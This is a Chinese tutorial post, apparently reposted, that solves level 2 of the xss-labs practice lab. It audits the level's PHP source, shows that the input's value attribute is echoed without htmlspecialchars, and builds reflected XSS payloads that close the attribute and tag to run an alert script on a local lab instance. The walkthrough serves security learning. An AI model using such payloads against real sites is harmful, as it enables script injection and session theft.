IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> 安全-Level2之标签闭合(xss-labs) -> 正文阅读

[PHP知识库]安全-Level2之标签闭合(xss-labs)

前言

记录一下学习过程,实际的情况可能有较多的变化
安装步骤跳过,源码可去github上下载

构造payload的时候,就看你值是传入了哪一个参数中
value的参数是用的双引号将值括起来的,所以payload才需要的双引号构造闭合条件

xss-labs下载

PHP: htmlspecialchars - Manual

一、题目

访问http://127.0.0.1/xss-labs-master/level2.php?keyword=test

在这里插入图片描述

二、源码审计

源码如下

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level3.php?writing=wait"; 
}
</script>
<title>欢迎来到level2</title>
</head>
<body>
<h1 align=center>欢迎来到level2</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>
<center><img src=level2.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

在这里插入图片描述

htmlspecialchars函数会按下面表格的方式来转换字符

在这里插入图片描述
在这里插入图片描述

三、绕过

[1]. 测试

因为直接弹窗成功的时候会跳到下一关,所以可以先将对应的代码注释

在这里插入图片描述

直接输入<script>alert(233)</script>的时候,发现javascript代码直接被打印出来了没有执行

在这里插入图片描述

输入& " ' < >后,查看html源码
第一处中发现仅单引号没有被转换
而第二处中虽然没有被转换,但是直接被引号引起来了,被当成了字符输出

在这里插入图片描述

[2]. 第一处调用点

先看第一处调用$str变量的地方,因为外部都是使用的双引号
而只有单引号不会被htmlspecialchars函数转换,所以没法闭合双引号

echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

在这里插入图片描述

[3]. 第二处调用点

再看一下第二处,用了双引号、单引号和点将变量括起来

<input name=keyword  value="'.$str.'">

在这里插入图片描述

第一个单引号是和<center>之前的单引号形成的闭合,被echo出来的代码如下

<center>
<form action=level2.php method=GET>
<input name=keyword  value="

在这里插入图片描述

第二个单引号是和</center>后面的单引号进行闭合,被echo出来的代码如下

">
<input type=submit name=submit value="搜索"/>
</form>
</center>

在这里插入图片描述

[4]. 构造payload

因为$str是需要被echo出来的,所以需要使用单引号或者是双引号将javascript脚本括起来

payload:
"<script>alert(233)</script>"'<script>alert(233)</script>'

value的值是使用双引号括起来的,所以需要在$str使用双引号让value="值"中的两个双引号闭合掉
这样里面的javascript脚本才会生效

payload:
"<script>alert(233)</script>"

此时如果直接传入上面的payload<input>标签的代码就会变成如下的样子
input标签就没掉了>,代码末尾的"">就相当于一个字符串

在这里插入图片描述

所需需要补上>,此时就可以直接弹窗了

payload:
"><script>alert(233)</script>"

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

如果想要后面的"">也生效的话,可以再修改一下payload让其闭合成另外的标签,比如<input>标签

payload:
"><script>alert(233)</script><br><input value="小狐狸

在这里插入图片描述

在这里插入图片描述

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-12-24 18:16:21  更:2021-12-24 18:16:46 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/23 15:48:17-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码